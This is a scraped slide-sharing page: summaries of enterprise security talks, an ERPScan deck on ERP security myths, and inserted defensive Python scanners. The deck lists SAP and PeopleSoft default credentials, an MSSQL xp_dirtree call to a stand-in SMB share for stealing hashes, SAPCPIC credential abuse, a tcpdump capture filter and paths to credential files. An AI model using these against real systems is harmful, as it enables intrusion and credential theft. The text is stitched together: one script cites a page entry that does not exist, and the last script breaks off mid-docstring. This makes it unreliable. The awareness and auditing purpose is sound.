Some of the most famous information breaches over the past few years have been a result of entry through embedded and IoT system environments. Often these breaches are a result of unexpected system architecture and service connectivity on the network that allows the hacker to enter through an embedded device and make their way to the financial or corporate servers. Experts in embedded security discuss key security issues for embedded systems and how to address them.
How to Protect Your Oracle Database from Hackers (Jeff Kayser)
Secure your databases! That’s where all the juicy information is, right? You know that, and hackers know that. Securing an Oracle database is a journey, and you need to take the first step. Come see how you can protect your Oracle Database from hackers.
Securing Systems - Still Crazy After All These Years (Adrian Sanabria)
This document discusses the ongoing challenges of securing systems and networks. It notes that while cybersecurity basics like asset discovery, vulnerability management, and hardening are important, they are also very difficult tasks given the complexity of modern IT environments. The constant evolution of threats, emerging technologies, and lack of standardized frameworks add to these challenges. However, taking a perspective focused on resilience over perfection, prioritizing the highest risks, and learning from breaches can help tackle security issues in a pragmatic way. The presentation provides strategies for discovering assets, managing vulnerabilities, and hardening systems effectively.
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements (Olivier DASINI)
MySQL Enterprise Transparent Data Encryption (TDE) protects your critical data by enabling data-at-rest encryption in the database. It protects the privacy of your information, prevents data breaches and helps meet regulatory requirements including the Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA) and numerous others.
MySQL Enterprise Audit provides an easy to use, policy-based auditing solution that helps organizations implement stronger security controls and satisfy regulatory compliance.
As more sensitive data is collected, stored and used online, database auditing becomes an essential component of any security strategy. To guard against the misuse of information, popular compliance regulations including HIPAA, Sarbanes-Oxley, and the PCI Data Security Standard require organizations to track access to information.
MySQL Enterprise Firewall guards against cyber security threats by providing real-time protection against database specific attacks. Any application that has user-supplied input, such as login and personal information fields is at risk. Database attacks don't just come from applications. Data breaches can come from many sources including SQL virus attacks or from employee misuse. Successful attacks can quickly steal millions of customer records containing personal information, credit card, financial, healthcare or other valuable data.
MySQL Enterprise Masking and De-identification provides an easy to use, built-in database solution to help organizations protect sensitive data from unauthorized uses by hiding and replacing real values with substitutes.
MySQL Enterprise Edition provides ready to use external authentication modules to easily integrate existing security infrastructures, including Linux Pluggable Authentication Modules (PAM) and Windows Active Directory.
The document discusses security issues related to SAP solutions and introduces ERPScan as an innovative product to help address these issues. It notes that over 2500 security notes have been released for SAP, highlighting growing threats. ERPScan provides integrated assessment of application platform security, ABAP code security, and business logic security. It can monitor SAP servers for vulnerabilities, misconfigurations, critical authorizations, and compliance with standards. The system aims to help automate security checks and reduce costs associated with SAP security problems.
Brighttalk understanding the promise of sde - final (Andrew White)
Mr. White has 15 years of experience designing and managing systems monitoring and event management software. He previously led monitoring organizations at a Fortune 100 company and consulted for various organizations. He is now a cloud and smarter infrastructure specialist at IBM. The document discusses software-defined environments and their promise to increase agility through automation and integration of IT infrastructure.
Oracle PeopleSoft applications are under attacks (Hack in Paris) (ERPScan)
Oracle is the second largest vendor in the ERP market, and its PeopleSoft is used by more than 7,000 companies, including about 50% of the Fortune 100. PeopleSoft applications are used worldwide, with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes
1. The document discusses how security is changing with new technologies like cloud computing, DevOps, and agile development. Traditional security practices are no longer effective.
2. It advocates migrating security left in the development process so it is designed into applications from the beginning. This allows for a faster security feedback loop.
3. Security needs to be automated and tested using tools and data platforms. Monitoring and inspecting everything is important for the new dynamic environments. Security decisions and controls are also changing to adapt to these new realities.
Microsoft Power Platform Governance with Runpipe (Runpipe)
www.runpipe.com
This slide deck is designed for anyone responsible for the governance and adoption of Power Apps, Power Automate and Power BI in large organisations.
It will list all the features, tools and practices available in the Power Platform to help you monitor, protect and support your data and applications, while also enabling and encouraging innovation from your makers.
It shares top tips and best practice suggestions for governance, security and monitoring, and strategies employed by customers to enable digital transformation with the Power Platform.
Runpipe provides an intuitive platform that brings together security, governance and enablement for multiple Low-Code Platforms, all in one place.
The presentation describes 5 steps you should take to secure your SAP. They are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses how Zurich Insurance was able to deliver DevOps style production values and double performance of their Risk Management Platform using PureApplication and UrbanCode Deploy. PureApplication allowed them to create reusable patterns for deploying the solution components. UrbanCode Deploy provided automated deployment of the patterns and management of the environments. Together, PureApplication and UrbanCode Deploy provided a synergetic solution that rapidly and consistently deployed the overall Risk Management Platform, reducing downtime and speeding up computation times.
The document discusses Oracle Solaris 11.4 and how it provides a trusted business platform for modernizing critical applications. It highlights how Oracle Solaris 11.4 allows businesses to leverage existing investments, improve security and capacity, simplify management through integration with popular open source tools, and deploy applications on a modern enterprise UNIX infrastructure.
Learn how HP Fortify On Demand is leveraging Fortify Runtime Protection to protect our own cloud services. See tips and techniques learned from deploying Runtime Protection in the real world, and learn how you can leverage the same technology in your environment without compromising performance or uptime. You’ll come away with tips on deploying, managing, and integrating Fortify Runtime Protection so you can block attacks while providing your developers with line-of-code detail regarding how to close the holes.
Similar to ERP Security. Myths, Problems, Solutions
SAP Mobile infrastructure consists of multiple systems such as SAP Mobile Platform (formerly Sybase Unwired Platform) also SAP Afaria MDM solution, Sybase SQL Anywhere Database, and hundreds of SAP's mobile applications. They even have their own store for mobile apps that can be developed by third parties. This talk highlights how one can hack SAP Mobile.
In this popular platform we discovered many typical vulnerabilities (XSS, XXE, hard-coded static encryption keys) as well as vulnerabilities specific to the platform: logic flaws and privilege escalations. As a result, after compromising the SAP Mobile platform, we demonstrated how to get access to the mobile phones it manages.
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm... (ERPScan)
This research includes a detailed attack timeline, identifies what kind of vulnerability was exploited, and provides recommendations on how to avoid data breaches in SAP systems.
The latest changes to SAP cybersecurity landscape (ERPScan)
The document discusses cybersecurity risks related to SAP systems. It describes two main risks: 1) Credit card data theft, where a hacker could access tables storing unencrypted credit card data in the SD module and steal the data. 2) Competitive intelligence theft through the SRM module, where a competitor could access bidding information to undercut prices unfairly. The document advocates for stronger configuration controls, access management, and patching to help mitigate these risks.
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP (ERPScan)
This document discusses vulnerabilities in connecting ERP and ICS systems. It notes that while ERP, ICS, and other business systems need to be connected to share information, these connections can be exploited by attackers to infiltrate corporate networks. The document outlines several ways that vulnerabilities in ERP systems, misconfigurations, unnecessary privileges, and system interconnectivity can be leveraged to access sensitive business data or disrupt operations. It emphasizes that securing these connections and monitoring for security issues is critical for business security and continuity.
5 real ways to destroy business by breaking SAP applications (ERPScan)
This document discusses security risks related to SAP applications. It describes 5 ways that business applications can be broken into, including espionage, sabotage, and fraud. Specific risks discussed include theft of credit card data from SAP's SD module, and compromise of competitive bidding information from the SRM module. The document advocates for security measures like configuration checks, access controls and code scanning to help defend against attacks.
13 real ways to destroy business by breaking company’s SAP applications (ERPScan)
All SAP risks can be divided into three groups: espionage, sabotage and fraud.
The presentation reviews the 13 most dangerous risks any business may face. For every risk, it gives its type, attack scenario, affected sector, and vulnerable module.
If I want a perfect cyberweapon, I'll target ERP - second edition (ERPScan)
This document discusses security risks associated with enterprise resource planning (ERP) systems like SAP. It begins by noting how critical ERP systems are for large companies and the vast number of customers that major ERP vendors have. It then provides examples of security risks like espionage, sabotage and fraud that can occur in ERP modules like materials management. Specific vulnerabilities that could allow manipulating materials prices or blocking materials posting are described. The document emphasizes that while examples focus on SAP, the risks apply to all major ERP systems.
This document discusses security vulnerabilities in SAP systems. It notes that many SAP systems have non-web services exposed that could allow remote access. It also details how passwords are sometimes stored insecurely in SAP shortcuts, log files, and database tables, allowing attackers to gain access to systems and steal sensitive data. The document recommends steps companies can take to prevent such vulnerabilities, like patching systems, not storing passwords in shortcuts, and using more secure authentication methods.
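One concrete check for the two kinds of credential leakage raised on this page, passwords hard-coded in DevOps build scripts and tool configurations (the BeyondTrust DevOps entry above) and passwords left in SAP shortcut files and logs (this entry), as an added example that is not part of either presentation. The file contents are constructed; the INI-style shortcut layout and its field names (`Name=`, `PW=`) are assumptions for the example, not SAP’s documented shortcut format. The scanner flags credential-looking keys with literal values, skips values that are only references to an environment variable or vault, and masks what it reports so the report itself does not become the next leak.

```python
import re

# Constructed sample files; none of these are real credentials or real
# files from any system. The .sap layout (INI sections, Name=, PW=) is an
# assumption for the example, not SAP's documented shortcut format.
SAMPLES = {
    "build.sh": "export DB_USER=ci\nexport DB_PASSWORD='Summer2015!'\n./gradlew build\n",
    "ci.yml": 'env:\n  SAP_RFC_PASSWD: "Hunter2"\n  LOG_LEVEL: info\n',
    "PRD.sap": "[System]\nName=PRD\nClient=100\n[User]\nName=DDIC\nPW=PAL7fh2Ko\n",
    "app.log": "2015-06-03 10:12:01 INFO login user=JDOE pwd=Welcome1 client=100\n",
    # The corrected form: the value is looked up at runtime, not stored.
    "config.py": "DB_PASSWORD = os.environ['DB_PASSWORD']  # injected by the vault agent\n",
}

# key=value or key: value where the key looks like a credential field and the
# value is a bare or quoted literal.
SECRET_RE = re.compile(
    r"(?i)\b(?P<key>[A-Z0-9_.-]*(?:pass(?:word|wd)?|pwd|pw|secret|token|api[_-]?key)[A-Z0-9_.-]*)"
    r"\s*[=:]\s*(?P<q>[\"']?)(?P<val>[^\"'\s,;]+)(?P=q)"
)

# Values that are indirections rather than literals: environment variables,
# template placeholders, vault references, "fill me in" markers.
REFERENCE_PREFIXES = ("$", "%", "{{", "os.environ", "vault:", "<")


def is_reference(value: str) -> bool:
    return value.startswith(REFERENCE_PREFIXES)


def mask(value: str) -> str:
    """Never echo the secret back into a report that will itself be stored."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def scan_text(name: str, text: str) -> list:
    """Return (file, line, key, masked value) for every literal credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in SECRET_RE.finditer(line):
            if is_reference(m.group("val")):
                continue
            findings.append((name, lineno, m.group("key"), mask(m.group("val"))))
    return findings


def scan_all(files: dict) -> list:
    out = []
    for name, text in files.items():
        out.extend(scan_text(name, text))
    return out


if __name__ == "__main__":
    for f in scan_all(SAMPLES):
        print("%s:%d  %s = %s" % f)
```

Run against the samples it reports the build script, the CI file, the shortcut file and the log line, and stays silent on `config.py`, which is the shape the DevOps entry argues for: the credential is resolved at run time from a managed store rather than written into the artifact. The same scan belongs in the CI pipeline as a blocking step, and the log-line case is a reminder that removing a hard-coded password from source is not enough if the application then writes it out on login.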
If I want a perfect cyberweapon, I'll target ERP (ERPScan)
ERP systems are widely used in Oil and Gas, Manufacturing, Logistics, Financials, Nuclear, Retail, Telecommunication and other industries. All mission-critical data is stored in ERP systems, so attacks against them may result in Espionage, Sabotage and Fraud.
The presentation gives examples of real and potential attacks and describes important details of ERP security.
Alexander Polyakov, CTO of ERPScan, presented this talk at RSA Conference Europe 2013.
SAP is the most popular business application, with more than two hundred forty thousand installations all over the world. People spend enormous amounts of money to install it and then forget about security. Yet all business processes run in ERP systems, and all critical information is stored there: finances, HR, clients. Not caring about the security of this data is not sensible.
SAP NetWeaver Development Infrastructure is a complex system. It combines the characteristics and advantages of local development environments with a server-based development landscape, and centrally provides the means to support the software, implement new features, manage the lifecycle of a product, etc. Its main aim is to control the deployment of components in the system landscape in a standardized manner.
The key component of the DI scheme is the Software Deployment Manager (SDM). It is directly connected to the production systems, which is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
The presentation describes 5 steps you should take to secure your SAP. They are:
1. Pentesting and Audit
2. Compliance
3. Internal security and SOD
4. ABAP Source code review
5. Forensics
This document discusses OLAP and MDX injection attacks. It provides an overview of OLAP and how MDX is used to query multidimensional data cubes. The document then explains how MDX injections can be used to expose sensitive data by manipulating MDX queries. Specific techniques are described, such as injecting into the WITH or SELECT clauses of an MDX query to conduct partial data retrieval or blind injections.
The document discusses security issues related to SAP systems and portals. It notes that while SAP is widely used, security vulnerabilities are common due to lack of logging and exposure of services. The document emphasizes that SAP portals deserve attention as they provide a common entry point for attackers and link to other critical systems. Proper monitoring of portals and exposed services is needed to detect attacks and unauthorized access.
SAP is the most popular business application, with more than one hundred eighty thousand installations all over the world. People spend enormous amounts of money to install it and then forget about security. In ERP systems all business processes are performed and all critical information is stored.
The presentation describes how SAP Portal works and the kinds of attacks it can be exposed to.
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine (ERPScan)
SAP is the most popular business application, with more than one hundred eighty thousand installations all over the world. People spend enormous amounts of money to install it and then forget about security. In ERP systems all business processes are performed and all critical information is stored: finances, HR, clients. Not caring about the security of this data is not sensible.
The presentation provides examples of simple and advanced attacks along with ways to avoid them.
1. Invest in security to secure investments
ERP Security. Myths, Problems, Solutions
Alexander Polyakov, CTO, ERPScan
2. About ERPScan
• The only 360-degree SAP security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
3. Intro
• ERP - Enterprise resource planning is an integrated computer-based system used to manage internal and external resources including tangible assets, financial resources, materials, and human resources – Wikipedia
4. Intro
Business applications like ERP, CRM, SRM and others are one of the major topics within the scope of computer security, as these applications store business data and any vulnerability in them can cause a significant monetary loss or even stoppage of business.
5. Main Problems in ERP Security
• Complex structure (complexity kills security)
• Different vulnerabilities at all levels
• Inside a company (closed world)
• Rarely updated: administrators are afraid the system can be broken during updates
6. Myths
Myth 1: Business applications are only available internally, which means no threat from the Internet
Myth 2: ERP security is a vendor's problem
Myth 3: Business application internals are very specific and not known to hackers
Myth 4: ERP security is all about SOD
7. Myth 1: Business Applications are Only Available Internally
• Top management point of view
– This myth is popular for internal corporate systems: people think these systems are only available internally
• Real life
– Yes, maybe in the mainframe era with SAP R/2, and in some implementations of R/3, you could use SAP only internally, but not now, in the era of global communications. As a minimum you need integration with:
o Other offices
o Customers and suppliers
o For SAP systems, a connection to the SAP network
Even if you do not have a direct connection, there are user workstations connected to the Internet
8. Myth 1: Business Applications are Only Available Internally
It is necessary to bring together people who understand ERP security and people who understand the Internet, e-mail and the security of web services
10. Myth 2. ERP Security is a Vendor's Problem
From the point of view of the law:
• The vendor is NOT responsible for vulnerabilities in its products
• Business application security is the client's problem
11. Myth 2. ERP Security is a Vendor's Problem
From the technical point of view: there can be many failures even if the software is secure
Vendor problems:
1. Program errors
2. Architecture errors
Client problems:
3. Implementation architecture errors
4. Defaults / misconfigurations
5. Human factor
6. Patch management
7. Policies / processes / etc.
12. Myth 3. Business Application Internals are not Known to Hackers
Current point of view:
• Mostly installed inside a company
• Not as popular among hackers as Windows or Apple products
• Closed world
• Security through obscurity
13. Myth 3. Business Application Internals are not Known to Hackers
Real life:
• Popular products are under attack by hackers and are becoming more and more secure
• Business applications WERE closed, but over the last 5 years they have become more and more popular on the Internet
• And also popular with hackers and researchers (will be shown in the statistics later)
• Unfortunately, their security level is still like 3-5 years ago
• Now they look like a defenseless child in a big city
14. Myth 4. ERP Security is All about SOD
Current point of view:
• Many people, especially ERP people, think that security is all about SOD
Real life:
• Setting up AD access control does not give you a secure infrastructure
• Buying a new engine for your car every year will not help you if you simply puncture a wheel
• Also remember the Sachar Paulus interview that says: "other threat comes from people connecting their ERP systems to the Internet"
15. Myth 4. ERP Security is All about SOD
An ERP system with secure SOD and nothing else is much like spending all your money on video systems and biometric access control while leaving the back door open for the housekeepers
16. Myth 4. ERP Security is All about SOD
Top 10 Application Implementation Problems (OWASP-EAS EASAI Top 10)

 #  Problem                                      Severity  Access
 1  Lack of patch management                     CRITICAL  REMOTE
 2  Default passwords for application access     CRITICAL  REMOTE
 3  SOD conflicts                                CRITICAL  LOCAL
 4  Unnecessary enabled application features     HIGH      REMOTE
 5  Open remote management interfaces            HIGH      REMOTE
 6  Lack of password lockout/complexity checks   MEDIUM    REMOTE
 7  Insecure options                             MEDIUM    REMOTE
 8  Unencrypted communications                   HIGH      REMOTE
 9  Insecure trust relations                     MEDIUM    LOCAL
10  Guest access                                 MEDIUM    REMOTE
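Two items of the list above, default passwords (2) and missing lockout/complexity checks (6), are decided in an ABAP system by a handful of login/* profile parameters, so an implementation assessment starts by reading the instance profile. The following Python is an added example, not code from the slides or from ERPScan: the parameter names are real SAP profile parameters, but the baseline thresholds, the defaults assumed for unset parameters and the sample profile are this example's own assumptions.

```python
"""Check an SAP ABAP instance profile against a password-policy baseline.

Added example, not from the slides: the login/* names are real SAP profile
parameters; the baseline thresholds, the shipped defaults assumed for unset
parameters and the sample profile are constructed for illustration.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    op: str                          # "min": value >= threshold; "max": <=; "eq": ==
    threshold: int
    zero_is_unlimited: bool = False  # a value of 0 switches the control off


# Assumed baseline (not an SAP or ERPScan recommendation).
BASELINE = {
    "login/min_password_lng": Rule("min", 8),
    "login/fails_to_user_lock": Rule("max", 5),
    "login/password_expiration_time": Rule("max", 90, zero_is_unlimited=True),
    "login/no_automatic_user_sapstar": Rule("eq", 1),
    "login/password_downwards_compatibility": Rule("eq", 0),
}

# Assumed values for parameters a profile leaves unset (older-release defaults).
SHIPPED_DEFAULTS = {
    "login/min_password_lng": 6,
    "login/fails_to_user_lock": 5,
    "login/password_expiration_time": 0,
    "login/no_automatic_user_sapstar": 0,
    "login/password_downwards_compatibility": 1,
}


def parse_profile(text):
    """Parse 'name = value' lines of an instance profile; '#' starts a comment."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        name, value = (part.strip() for part in line.split("=", 1))
        params[name] = value
    return params


def check_profile(text):
    """Return sorted (parameter, effective value, reason) findings.

    An unset parameter is judged by its assumed shipped default, because the
    system behaves as if that value were configured.
    """
    params = parse_profile(text)
    findings = []
    for name, rule in BASELINE.items():
        raw = params.get(name)
        origin = "explicitly set" if raw is not None else "unset, shipped default applies"
        try:
            value = int(raw) if raw is not None else SHIPPED_DEFAULTS[name]
        except ValueError:
            findings.append((name, raw, "non-numeric value"))
            continue
        if rule.zero_is_unlimited and value == 0:
            findings.append((name, value, f"0 disables the control ({origin})"))
        elif rule.op == "min" and value < rule.threshold:
            findings.append((name, value, f"below minimum {rule.threshold} ({origin})"))
        elif rule.op == "max" and value > rule.threshold:
            findings.append((name, value, f"above maximum {rule.threshold} ({origin})"))
        elif rule.op == "eq" and value != rule.threshold:
            findings.append((name, value, f"expected {rule.threshold} ({origin})"))
    return sorted(findings, key=lambda f: f[0])


# Constructed sample profile (not from a real system).
SAMPLE_PROFILE = """\
SAPSYSTEMNAME = DM0
INSTANCE_NAME = DVEBMGS00
login/min_password_lng = 6
login/fails_to_user_lock = 12
login/password_expiration_time = 0        # never expires
# login/no_automatic_user_sapstar deliberately left unset
"""

if __name__ == "__main__":
    for name, value, reason in check_profile(SAMPLE_PROFILE):
        print(f"{name} = {value}: {reason}")
```

An unset parameter is reported against its shipped default rather than skipped, because that is the value the system actually enforces; 0 for the expiration timer is treated as a finding even though it is numerically below the maximum, because it means passwords never expire. On the sample profile all five parameters are reported; a profile that sets every one of them to the baseline value produces no findings.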
19. Development Problems
Languages, technologies and platforms:

Platform    Own technologies    Java                        Web          Other
SAP         ABAP/BSP            jsp/servlets/ejb/j2ee/rmi   html/js      C/wbs/sql
Oracle      BPEL/PLSQL          jsp/servlets/ejb/j2ee/rmi   html/js/cgi  C/wbs/sql
PeopleSoft  PeopleCode/PLSQL    jsp/servlets/ejb/j2ee/rmi   html/js/cgi  C/wbs/sql
20. Implementation Problems
• Different databases
• Different OS
• Different product versions
• Huge amount of customization
• Different architecture
21. Different Architecture
• Different clients (mandants) on different instances on different physical servers
• Can be DEV, TEST or PROD
• Can have different modules such as SRM/PLM/CRM/ERP connected in different ways to each other and to other systems
• Different DMZ / terminal server installations
• Add IM/LDAP/AD and other solutions to the architecture
• And even more
22. Different OS
OS popularity for SAP:
• Windows NT - 28%
• AIX - 25%
• Linux - 19%
• SunOS - 13%
• HP-UX - 11%
• OS/400 - 4%
23. Different Platforms
• ABAP or JAVA or BusinessObjects
• ABAP alone can be:
- SAP R/3 4.6
- SAP R/3 4.7 Enterprise
- SAP NetWeaver 6.4
- SAP NetWeaver 7.0
- SAP NetWeaver 7.2
- SAP NetWeaver 7.3
- Also add-ons
- Also industry solutions
24. Great Amount of Customization
• Approximately 40-60% of an ERP is custom code
• With its own vulnerabilities
• There can also be many custom items
– Authorization objects
– Authorizations
– Roles
– Transactions
– Programs
– Etc.
If you have customized the system you must have customized security solutions, which is much harder than checklist-like solutions
26. How to Make a Secure ERP System in 5 Steps
• Develop secure software
• Implement it securely
• Teach administrators
• Increase user awareness
• Control the whole process
27. Introducing OWASP-EAS
• Develop secure software – OWASP-Enterprise Business Application Security Vulnerability Testing Guide v0.1
• Implement it securely – Enterprise Business Application Security Implementation Assessment Guide
• Teach administrators – Our trainings
• Increase user awareness – SAP Security in Figures report
• Control the whole process – Tools
28. Introducing OWASP-EAS
• Need guides for developers and vulnerability testers to assess enterprise applications
• Sources:
– We have OWASP – good, and focused mainly on WEB vulnerabilities
– We have WASC – good, but focused on WEB
– We have SANS 25 – good, but not about ERP
– We have CWE – good, but too big
– We have OSSTMM – good, but focused on assessing systems, not software
– SAP/Oracle security guides – good, but too much information
• Result:
– OWASP-EAS Enterprise Business Application Security Vulnerability Testing Guide v0.1
29. Introducing OWASP-EAS
• Analyze the most popular vulnerabilities in enterprise systems
• Create a TOP 10 list
• Collect information about examples, threats and countermeasures
• Release the guide
• After a year, go back to step 1
32. Examples
XSS
• There is an unlimited number of XSS in SAP
• The latest one at http://erpscan.com
Information Disclosure
• ORACLE Financials
– /pls/DAD/find_web.ping
– /OA_HTML/jsp/fnd/fndping.jsp
• SAP NetWeaver
– /sap/public/info
33. Examples of Network Security
Improper access control / traversal (SAP NetWeaver)
• RFC functions can be called remotely
• You need a user and a password
• ALMOST ALL SAP administrators do not change the password for user SAPCPIC
• Using its credentials we can call a function that tries to read a file on our SMB share
• Gotcha! Hashes are stolen
35. Examples of Frontend Vulnerabilities
• Buffer overflow
– Can be exploited to gain remote access to the user
– Also format string and memory corruption
– The latest one at http://www.exploit-db.com/exploits/14416/
– NEW vulns are being patched now. Soon at http://erpscan.com/
– Also other vulnerable ERPs
36. Examples of Frontend Vulnerabilities
• Hard-coded passwords (some ERPs, we don't name them)
– Very dangerous
– Fat client with hard-coded passwords to the database
– Access rights are checked on the client side
– Exploited simply by sniffing the database connection and connecting directly with the stolen password
– As a result we are DBA on the database
38. Enterprise Application Security Implementation Assessment
• Building a secure application is not enough
• You also need to securely
– Install it
– Configure it
– Manage it
39. Enterprise Application Security Implementation Assessment
• Analyze the most critical areas of misconfiguration
• Group them
• Create a TOP 10 list
• Collect information about examples, threats and countermeasures
• Release the guide
• After a year, go back to step 1
42. Examples of Network Security
Capture SAP traffic (SYN/FIN packets to destination ports 32xx and 36xx):
tcpdump -n -i eth0 'tcp[13] & 3 != 0 and ((tcp[2:2] >= 3200 and tcp[2:2] < 3300) or (tcp[2:2] >= 3600 and tcp[2:2] < 3700))'
• Find a user and decode the password. The user has access to an XI system without business data
• Use the SM59 transaction, which shows all RFC connections. Only one connection, to the HR system, with hardcoded credentials was found
• The credentials were those of the remote RFC user created for data exchange
• This user, called ALEREMOTE, had SAP_ALL privileges
44. OS Vulnerabilities: Access to Critical Files
There are many critical files on a SAP server that can be used by an unprivileged user to gain access to the SAP application:
• Database files (DATA + encrypted Oracle and SAP passwords)
– /oracle/<DBSID>/sapdata/system_1/system.data1
• SAP config files (encrypted passwords)
– /usr/sap/<SAPSID>/<Instance ID>/sec/*
– /usr/sap/<SAPSID>/<Instance ID>/sec/sapsys.pse
• Configtool config files (encrypted database password)
– \usr\sap\DM0\SYS\global\security\data\SecStore.properties
– \usr\sap\DM0\SYS\global\security\data\SecStore.key
• J2EE trace files (plaintext passwords)
– /usr/sap/<sapsid>/<InstanceID>/j2ee/cluster/dispatcher/log/defaultTrace.0.trc
• ICM config files (encrypted password)
– \usr\sap\DM0\SYS\exe\uc\NTI386\icmauth.txt
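A quick way to turn that list into a check on the host is to look for files matching those paths that are readable by "other". The script below is an added example, not from the slides or from ERPScan: the patterns are taken from the list above with <SAPSID>, <Instance ID> and <DBSID> replaced by wildcards, and the sample tree (SID DM0, instance DVEBMGS00, the file modes) is constructed so the check runs against a temporary directory instead of a real server.

```python
"""Flag SAP server files that any local user can read.

Added example, not from the slides: the path patterns follow the files listed
above; the directory tree, SID DM0 and file modes are constructed.
"""
import glob
import os
import stat
import tempfile

# Patterns relative to the filesystem root; <SAPSID>/<Instance ID>/<DBSID> are
# wildcards so one list serves every system.
CRITICAL_PATTERNS = [
    "oracle/*/sapdata/system_1/system.data1",
    "usr/sap/*/*/sec/*",
    "usr/sap/*/SYS/global/security/data/SecStore.properties",
    "usr/sap/*/SYS/global/security/data/SecStore.key",
    "usr/sap/*/*/j2ee/cluster/dispatcher/log/defaultTrace.*.trc",
    "usr/sap/*/SYS/exe/uc/*/icmauth.txt",
]


def world_readable(mode):
    """True if the 'other' class may read the file. Group access is left alone:
    on a SAP host the sapsys group legitimately contains <sid>adm and the
    database user."""
    return bool(mode & stat.S_IROTH)


def audit(root="/"):
    """Return sorted paths (relative to root) of critical files any user can read."""
    exposed = []
    for pattern in CRITICAL_PATTERNS:
        for path in glob.glob(os.path.join(root, pattern)):
            if os.path.isfile(path) and world_readable(os.stat(path).st_mode):
                exposed.append(os.path.relpath(path, root))
    return sorted(exposed)


def build_sample_tree(root):
    """Constructed tree: some files left world-readable, others restricted."""
    modes = {
        "usr/sap/DM0/DVEBMGS00/sec/sapsys.pse": 0o644,                      # exposed
        "usr/sap/DM0/SYS/global/security/data/SecStore.key": 0o600,         # ok
        "usr/sap/DM0/SYS/global/security/data/SecStore.properties": 0o640,  # ok (group sapsys)
        "usr/sap/DM0/DVEBMGS00/j2ee/cluster/dispatcher/log/defaultTrace.0.trc": 0o644,  # exposed
        "usr/sap/DM0/SYS/exe/uc/NTI386/icmauth.txt": 0o644,                 # exposed
        "oracle/DM0/sapdata/system_1/system.data1": 0o600,                  # ok
    }
    for rel, mode in modes.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("constructed placeholder\n")
        os.chmod(full, mode)
    return root


def demo():
    """Run the audit against the constructed tree instead of the real root."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_tree(tmp))


if __name__ == "__main__":
    for path in demo():
        print("world-readable:", path)
```

Group-readable files are deliberately not flagged: on a SAP host the sapsys group legitimately contains <sid>adm and the database administrator, and those files must stay readable by them. Run audit() with its default root of "/" on a real host; everything it returns can be read by any local account, including the PSE, the J2EE trace with plaintext passwords and the ICM authentication file.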
46. Examples of Database Vulnerabilities
• Unnecessary enabled services
– Any database has them by default
o Oracle – UTL_FILE, UTL_HTTP, UTL_TCP, etc.
– MSSQL
o master..xp_dirtree '\\fakesmbshare\e'
o Can be used to steal credentials
o Note: ERPs run the database under their own service credential, not as 'Network Service'
48. Examples of Application Vulnerabilities
• Default passwords
– Any ERP installs with predefined passwords
o For the application
o For the database
o Sometimes for the OS
– Most of them are well known
– Will be published at OWASP
49. SAP default passwords
• For application
• For database
– SAPR3/SAP
– + Oracle defaults in the older versions
50. PeopleSoft default passwords
• For application (many)
– FEDTBHADMN1/FEDTBHADMN1
– FEDTBHADMN1/FEDTBHMGR01
– FEDTBHMGR02/FEDTBHMGR02
– HAM/HAM
– etc.
• For database
– Peop1e/Peop1e
– PS/PS
– Sysadm/sysadm
– + Oracle defaults in the old versions
52. Examples of Application Vulnerabilities
Remote management interfaces
• Example of SAP (others have the same problems)
• There is web RFC access
• Google it: /sap/bc/webrfc
• All RFC features are possible
• Plus something more, including DoS/SMB relay
• Details later on http://erpscan.com
• Remote pwnage is possible
55. Examples of Frontend Vulnerabilities
Insecure distribution service
• Example of SAP (others have the same problems)
• SAPGUI is often distributed from a corporate file server
• Often this share is available to any user
• Configuration files and distributives can be overwritten
– Insert a Trojan
– Redirect to fake servers
The same problems arise when using terminal services
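Because a writable distribution share lets anyone replace the installer or point the configuration at a fake server, the practical control is to keep a hash manifest of the trusted distribution off the share and compare before each rollout. The Python below is an added example, not from the slides or from ERPScan: the manifest format is this example's own, and the file names (SetupAll.exe, saplogon.ini, sapmsg.ini) and the tampering are constructed for the demonstration.

```python
"""Verify a SAPGUI distribution share against a trusted hash manifest.

Added example, not from the slides: the manifest format, the file names and
the tampering in demo() are constructed for illustration.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """SHA-256 hex digest of a file, read in chunks so large installers fit."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map every file under root (relative path) to its SHA-256.

    Run once on a trusted copy of the distribution and store the result
    somewhere the share's users cannot write."""
    manifest = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def verify_share(root, manifest):
    """Compare the share with the trusted manifest.

    Returns sorted lists of files whose content changed ('modified'), files
    that disappeared ('missing') and files nobody put in the manifest
    ('unexpected', e.g. a dropped config that redirects to a fake server)."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "missing": sorted(p for p in manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in manifest),
    }


def write(root, rel, data):
    """Helper for the constructed scenario: write bytes to root/rel."""
    with open(os.path.join(root, rel), "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: the share is trusted, then someone with write
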